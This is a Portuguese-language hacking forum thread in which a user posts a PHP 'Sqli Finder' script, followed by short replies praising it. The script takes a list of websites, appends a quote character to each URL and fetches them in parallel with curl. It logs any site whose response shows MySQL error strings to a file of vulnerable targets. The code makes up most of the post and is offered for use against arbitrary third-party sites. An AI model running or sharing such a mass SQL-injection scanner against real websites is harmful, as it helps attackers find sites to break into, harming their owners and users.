Sqli Finder

n4sss

Elite Hacker

Registrado em: Aug 2010

Posts: 233
- Share
- Tweet
Font Size

#1

Tools Sqli Finder

18-10-2013, 22:05

Tool para automatizar a busca de sites com bugs de sql.

Use:

Código:

~$ php sqli.php sites.txt

Código:

Threads -> sqli($host, 10, $l); (Default: 10)

Code:

Código PHP:

<?php /* * Simple sqli finder by n4sss. * Just set a file with sites to test sqli in argv[1] * * http://www.youtube.com/watch?v=NzCL9uLkQSI * King! (8) * Just listen. * * n-l4b[no_spam]hotmail[dot]com * * */ set_time_limit(NULL); error_reporting(NULL); function check($file){ $number = count(array_filter(explode("\n", file_get_contents($file)))); return $number; } function sqli($host, $threads, $l){ $multi = curl_multi_init(); $bol = array_chunk($host, $threads); $cntz = 1; foreach($bol as $site){ for($i=0;$i<=count($site)-1;$i++){ $ch[$i] = curl_init(); curl_setopt($ch[$i], CURLOPT_URL, $site[$i].'\''); curl_setopt($ch[$i], CURLOPT_FOLLOWLOCATION, TRUE); curl_setopt($ch[$i], CURLOPT_RETURNTRANSFER, TRUE); curl_setopt($ch[$i], CURLOPT_USERAGENT, "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:22.0) Gecko/20100101 Firefox/22.0"); curl_setopt($ch[$i], CURLOPT_TIMEOUT, 8); curl_multi_add_handle($multi, $ch[$i]); }do{ curl_multi_exec($multi, $handle);usleep(1);}while($handle>0); foreach($ch as $ch_id => $cnt) { $grep[$ch_id] = curl_multi_getcontent($cnt); curl_multi_remove_handle($multi,$cnt); print "[$cntz] Fuzzing -> $site[$ch_id]\n"; if(preg_match('/Mysql_|SQL|mysql_num_rows()|mysql_fetch_assoc()|mysql_result()|mysql_fetch_array()|mysql_numrows()|mysql_preg_match()/',$grep[$ch_id])) { $fp = fopen($l, "a"); fwrite($fp, $site[$ch_id]."\n"); fclose($fp); flush(); } $cntz++; } } } if(!$argv[1]){ print "+--------------------------------------------------+\n"; print "|Please use correctly: |\n"; print "|Specify the file with the sites in argv[1] :) |\n"; print "+--------------------------------------------------+\n"; }else{ print "\n############ Simple sqli finder by n4sss ############\n"; if(!is_file("$argv[1]")) die("[-] FILE $argv[1] not found\n EXITING\n"); $host = array_filter(explode("\n", file_get_contents("$argv[1]"))); $l = "sqli_vulns.txt"; sqli($host, 10, $l); $number = check($l); print "[] Fuzz ok n4sss!\n"; print "We have -> ".$number." sites with sql error (:\n"; } ?>

n4sss@m4g1cl4b~#$I
just this.
Tags: Nenhum(a)

Top
Vetus

Programador

Registrado em: Jul 2011

Posts: 477
- Share
- Tweet
Font Size

#2

21-10-2013, 13:32

Digamos que você manja das computarias !

Belo post n4sss

Yes, I am a criminal. My crime is that of curiosity. My crime is
that of judging people by what they say and think, not what they look like.
My crime is that of outsmarting you, something that you will never forgive me
for.

I am a hacker, and this is my manifesto. You may stop this individual,
but you can't stop us all... after all, we're all alike.
Top
Comment
d3wls3

Membro

Registrado em: Sep 2011

Posts: 82
- Share
- Tweet
Font Size

#3

21-10-2013, 17:32

n4sss como sempre trazendo ótimas tools.

*******************************************
#! Perl - PHP - Python !#
*******************************************
r00t@ʤῲʪƷ#~> Zone-H
Top
Comment
Agares

Membro Participativo

Registrado em: Nov 2012

Posts: 123
- Share
- Tweet
Font Size

#4

01-11-2013, 10:41

Obrigado por compartilhar esta ferramenta

O Único modo de Evitar Erros é Adquirindo Experiência. No Entando a única Maneira de Adquirir Experiência é cometendo Erros.
Napoleão Bonaparti

sigpic

Skype: JoasRock
Top
Comment

Unconfigured Ad Widget

Anúncio

Tools Sqli Finder

Comment

Comment

Comment